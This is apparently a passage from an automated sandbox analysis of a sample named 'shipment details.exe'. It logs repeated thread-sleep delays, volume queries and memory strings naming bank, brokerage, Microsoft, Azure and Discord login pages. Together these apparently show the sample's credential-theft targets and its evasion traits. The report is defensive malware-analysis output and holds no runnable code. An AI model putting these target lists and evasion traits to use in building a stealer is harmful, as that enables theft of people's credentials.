Thread sleep time: -599343s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599224s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -599109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598968s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598856s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598732s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598625s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598515s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598406s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598297s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598187s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -598078s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597968s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597859s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597745s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597640s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597531s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597415s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597312s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597203s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -597093s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596984s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596875s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596765s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596656s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596546s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596437s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596326s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596218s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596109s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -596000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595890s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595781s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595672s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595562s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595453s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595343s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595234s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595125s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -595015s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594906s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594797s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594687s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 |
Thread sleep time: -594578s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599890 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599781 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599672 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599562 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599453 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599343 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599224 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 599109 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598968 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598856 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598732 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598625 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598515 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598406 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598297 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598187 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 598078 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597968 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597859 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597745 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597640 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597531 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597415 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597312 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597203 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 597093 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596984 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596875 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596765 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596656 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596546 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596437 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596326 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596218 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596109 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 596000 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595890 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595672 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595562 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595453 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595343 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595234 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595125 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 595015 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594906 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594797 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594687 |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Thread delayed: delay time: 594578 |
Jump to behavior |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: global block list test formVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - HKVMware20,11696428655] |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.co.inVMware20,11696428655d |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce87960e4dfa2< |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: turbotax.intuit.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: account.microsoft.com/profileVMware20,11696428655u |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.comVMware20,11696428655} |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office365.comVMware20,11696428655t |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4518709296.0000000001126000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696428655x |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: ms.portal.azure.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: discord.comVMware20,11696428655f |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: outlook.office.comVMware20,11696428655s |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696428655o |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696428655j |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: AMC password management pageVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: interactivebrokers.comVMware20,11696428655 |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~ |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h |
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696428655x |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Users\user\Desktop\shipment details.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\shipment details.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Jump to behavior |